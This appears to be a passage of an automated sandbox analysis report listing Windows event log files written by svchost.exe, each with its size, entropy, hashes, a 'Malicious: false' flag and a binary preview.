                                                                              Preview:ElfChnk.........?...............?............y...{...v.......................................................................bV................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&.......>h..................................................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):78040
                                                                              Entropy (8bit):4.115125812182842
                                                                              Encrypted:false
                                                                              SSDEEP:384:rhNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5pJk5pbik5pKik5yY5Lbik5p9i1:rSLpBVi7CPqmxVrJG5
                                                                              MD5:307202762BC0D629505B043E48EBD8F5
                                                                              SHA1:35899D2CEB5E7A18449FD32621BF7293748187C9
                                                                              SHA-256:AB64F4FFC75718788AE8855FD52E5C26CBB5EE3A7EC534817FDB600CE25AD52C
                                                                              SHA-512:CD9D3D2C5C40527A2828089A2C0129985B02C2665DD4F747ABF1FED5516230ADD7E093D473DC40738D429542E8E1FFC5F9E221406B4282E38F811AAB041CF841
                                                                              Malicious:false
                                                                              Preview:ElfChnk.'.......+.......'.......+............$..`+..gv,......................................................................O..................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...............................................................&.......................................**......'...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.322146858454247
                                                                              Encrypted:false
                                                                              SSDEEP:384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
                                                                              MD5:D8DABE7AC7FE8F2D1CD853002971BB8A
                                                                              SHA1:AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
                                                                              SHA-256:DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
                                                                              SHA-512:A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
                                                                              Malicious:false
                                                                              Preview:ElfChnk.U...............U...................`...h....fyC......................................................................K................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................F..............................&...............................................nw..............iq......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.475265357832672
                                                                              Encrypted:false
                                                                              SSDEEP:1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
                                                                              MD5:605D94FA0C65C59EECEECC2BEB2F61B5
                                                                              SHA1:28CA14F5E02A0A0348C4AC4A22BC228390B64F94
                                                                              SHA-256:4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
                                                                              SHA-512:10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................0k...l..C.......................................................................2\x5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................6Y......................................**..............X.j[d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.46831700157397
                                                                              Encrypted:false
                                                                              SSDEEP:1536:iyzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBLpANWy+7grnqOjzYC43sU4:iyzFyNsk4cLSKph9YC/cmqb5tKGjDLSo
                                                                              MD5:4FEAEE3DA2F7BB1815777105CDF76B8A
                                                                              SHA1:EB3F0A4949CE761726B8D7DDF1BD612851DAA1CE
                                                                              SHA-256:4EFF3A073B57EEBC98041219E5FF6461751D7744953C04398F401BFDE4592B43
                                                                              SHA-512:977F147DE7F6B560794D8B18CD0D048BB4F02A74A0E2CE016B4F05DFD5FF6A321789D053AD5A7A8A44E7FB0829B01B8E72C9796DDFD3D21B7ED393EF347DA46B
                                                                              Malicious:false
                                                                              Preview:ElfChnk.+.......[.......+.......[...........X]...^...........................................................................m.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F................................................................................................O.......8..&.......AR...6..12...............:......**......+.......*^..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.517082344367377
                                                                              Encrypted:false
                                                                              SSDEEP:384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
                                                                              MD5:2628D3458E9FBE638FC3A49E317866FA
                                                                              SHA1:8DB033ED373F8A837073679CE0F3B5DC1BD7085B
                                                                              SHA-256:D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
                                                                              SHA-512:6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................po..@q....`....................................................................\.$.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................e4.............../..s...........&................................................L..............e2......................**..H............<R.d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.4230300221826084
                                                                              Encrypted:false
                                                                              SSDEEP:384:Bhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinf:B6Ovc0S5UyEeDgLpIC4DoA40eW
                                                                              MD5:09FF105D11B8BC33F3A9D0296E57D282
                                                                              SHA1:1CC795962E55472E7CDFA50EA3E6254E534356EA
                                                                              SHA-256:876B33D842DE9261D25CD41B4A2A20382801BEC7DC3DF46999B6A465BFD64FB3
                                                                              SHA-512:68CB5854F9E5A193D2575C2524217F83A9A4BDDB1DCE8B3EB14671F925BC8391B074EAC0464B639A41387F8B3BEEE7CF44F70402CC3F8847B85115CAE45BF943
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........C...............C...........0{..8}..........................................................................1...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................7x......&...............................................................................6f......w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.773262505715791
                                                                              Encrypted:false
                                                                              SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
                                                                              MD5:C06B3BF303EBDD17D76D87B596EE5407
                                                                              SHA1:BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
                                                                              SHA-256:26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
                                                                              SHA-512:7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........T...............T...........@........J......................................................................?..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................vN......................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.2371167268838485
                                                                              Encrypted:false
                                                                              SSDEEP:384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
                                                                              MD5:3F2115642206C3D448781C58F4EE8AF3
                                                                              SHA1:1408F4FF05D6887F74B445E296BC9B69163EDDAE
                                                                              SHA-256:84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
                                                                              SHA-512:C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................@....a..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................5.................................................... ..........&................................$......**..`..............;f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.1631981097466806
                                                                              Encrypted:false
                                                                              SSDEEP:384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
                                                                              MD5:CBAE5379AAAD2B6A84714F5CEA39ACFA
                                                                              SHA1:A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
                                                                              SHA-256:726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
                                                                              SHA-512:7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.036288214996343
                                                                              Encrypted:false
                                                                              SSDEEP:384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
                                                                              MD5:80B64057A5C06D0016A06F2D493CF301
                                                                              SHA1:452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
                                                                              SHA-256:5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
                                                                              SHA-512:4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
                                                                              Malicious:false
                                                                              Preview:ElfChnk.\...............\.......................X...j.......................................................................LU.t................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.166433348209963
                                                                              Encrypted:false
                                                                              SSDEEP:384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
                                                                              MD5:9AB3073B8BEBBC3C1E9DCB47217C8E27
                                                                              SHA1:33477618A675262EFDC74FACE70AE448EE9CAA05
                                                                              SHA-256:E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
                                                                              SHA-512:58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):137904
                                                                              Entropy (8bit):4.620304944217381
                                                                              Encrypted:false
                                                                              SSDEEP:384:RhzMOYQNM6dM1MoYFMoYOKIKFKSKBKYKWKOKHxK/4KFKwKZKD4aKdKcKFKcKqKRQ:R5sFPRtF5sFPRtAO
                                                                              MD5:EE7B261E1F9728C6507A6DB2DEE42731
                                                                              SHA1:7550376E46ABA37E40B679442143EEAD093822FC
                                                                              SHA-256:22897A4D7F64F9C95953C63698DC1AEC4E6A8DAECAC4E4DE4717DEA41CF1B670
                                                                              SHA-512:F34B55A5D9EC37E776D957F5291AFEF981B2AEFF82B6E5BD294CB36E754B61452E07B2AC7C08D0DBDC6E33C4AC2D8CE8599622D5BC5D14F0A7285185E3975DB6
                                                                              Malicious:false
                                                                              Preview:ElfChnk..%.......%.......%.......%..........(.......Bd................................................................................................................6...=...........................................................................................................................f...............?...........................m...................M...F........................H......-...........................u...............................................&........*..%...........................**..0....%.......t.f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                                              Category:dropped
                                                                              Size (bytes):79016
                                                                              Entropy (8bit):1.8212529602764902
                                                                              Encrypted:false
                                                                              SSDEEP:384:y3hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUmRUm4hL6UsE0Z7:gY7L8lY7L8
                                                                              MD5:C762F00CE016F844F1F4B0BE70912D59
                                                                              SHA1:40D02A12912BC5A4D4A1D94B83978496B8A1272D
                                                                              SHA-256:7E2608282A73B6ED703D7D19FE9226D3F0A1A93F7F2A0720B71E231C216BF4E7
                                                                              SHA-512:D9ACB46EEDA7B0DF34CA9FB76B17FC2A242310BFB276FD336E18E67FB6CBE85CA349DC1BBA074BFED5A41CDB8ECE27E09793EB52A99EB73612A75EE0FD2B78A0
                                                                              Malicious:false
                                                                              Preview:ElfFile.....................................................................................................................\>.eElfChnk......................................1..(4..3.L......................................................................Z.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.20412940486325534
                                                                              Encrypted:false
                                                                              SSDEEP:48:MpVWd8YrP+8QNRBEZWTENO4brBE3oL0w/6y:EhNVaO8ioQw/6y
                                                                              MD5:634B132814A7789C13F456C30037EFA7
                                                                              SHA1:5F68D06911C7331376E1A8BD141E3BE658C0E404
                                                                              SHA-256:4547F08A878F35179A392EFE057ECD0FCBE08EC1712B045146D4C57F16758547
                                                                              SHA-512:5864EA04198286B03ABF90FF6ADF189AC6DBA8BC335139C357562641178E873AF91D35C9C6CE9A0E38AD008D71FC6CFA15D249896F0FA4595FA55613AAF7709C
                                                                              Malicious:false
                                                                              Preview:ElfChnk...............................................d.......................................................................)~................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**...............[..g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.9658503180918458
                                                                              Encrypted:false
                                                                              SSDEEP:384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
                                                                              MD5:9961A2C4F5AC430AB4FE55D69904E2C9
                                                                              SHA1:BA49A1A12A889812148BECC8D5B285AD418D54FE
                                                                              SHA-256:EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
                                                                              SHA-512:B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
                                                                              Malicious:false
                                                                              Preview:ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.093082662040085
                                                                              Encrypted:false
                                                                              SSDEEP:768:2/aQLuaIaWaIawa1WaWaMayazarOaLana+a+a1aUawaaaoagala/aLa0ava4aFaD:EL0G
                                                                              MD5:48E1C2B4CB34224C2D31E3EAB0970D09
                                                                              SHA1:72A9FB3CCF15619D111F51DA0D7B4CB700B89D00
                                                                              SHA-256:0BEB9E4E99CEA259E5B0363BC867AD5065359706FC8D7ECF6ED2202FD9AF4DF8
                                                                              SHA-512:61701FFE98593DFEA1DBFB77BF2FE4F17DA8C0C474D8D4438EDDFA42BC1E376D1212EDC08072A87CB659DA4198BB91C471277F9B0FDB20DB4AD24D6199CFE3F0
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........@...............@...............`....X..........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................**..H...............f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.3650161876414235
                                                                              Encrypted:false
                                                                              SSDEEP:384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
                                                                              MD5:346E087AE87A771402B2E38619AB7B71
                                                                              SHA1:4B7EFEA99E401A5E6C0D115E2B27C48778704C13
                                                                              SHA-256:82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
                                                                              SHA-512:63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.335318634068108
                                                                              Encrypted:false
                                                                              SSDEEP:384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
                                                                              MD5:3B31610BEABB5895A19C346C64C234C6
                                                                              SHA1:84316C06991A51AD91C247130B615F0E56CD4D01
                                                                              SHA-256:EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
                                                                              SHA-512:2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.7112352075765392
                                                                              Encrypted:false
                                                                              SSDEEP:192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
                                                                              MD5:5D63AFB3EA60A7655FF95B4DB1B451E0
                                                                              SHA1:B5D236316CC6617071D83D7E1B4367DDA1A889B1
                                                                              SHA-256:815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
